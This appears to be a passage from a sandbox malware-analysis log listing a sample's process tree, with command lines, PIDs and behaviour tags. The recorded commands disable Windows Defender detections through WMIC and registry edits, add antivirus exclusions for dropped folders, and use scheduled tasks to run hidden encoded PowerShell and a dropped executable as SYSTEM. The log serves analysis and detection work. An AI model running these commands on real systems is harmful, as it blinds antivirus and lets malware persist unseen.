forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3032

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:4280

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1776

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:2724

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3228

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2092

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3180

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:4304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:4476

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:3512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4076

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:4040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:60

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:2892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:1908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:4568

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4324

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4500

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4984

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4888

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3140

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3320

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2296

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:4480

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:32
3⤵
PID:4484

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:64
3⤵
PID:1240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:32
3⤵
PID:744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:64
3⤵
PID:4804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:32
3⤵
PID:4228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:64
3⤵
PID:4816

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gtBeWUGGv" /SC once /ST 05:17:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:4956

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gtBeWUGGv"
2⤵
PID:4916

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gtBeWUGGv"
2⤵
PID:2744

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 07:36:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\uHnQBsa.exe\" gh /site_id 767 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2472

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
2⤵
PID:1804

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1420

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2012

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3880

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\uHnQBsa.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\uHnQBsa.exe gh /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:4028

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1760

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:4436

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:4600

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:4412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4624

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:4052

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:3848

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:4216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1300

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1336

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
2⤵
PID:2896

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:204

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:2184

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:4500

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:4416

C:\Windows\SysWOW64\schtasks.exe
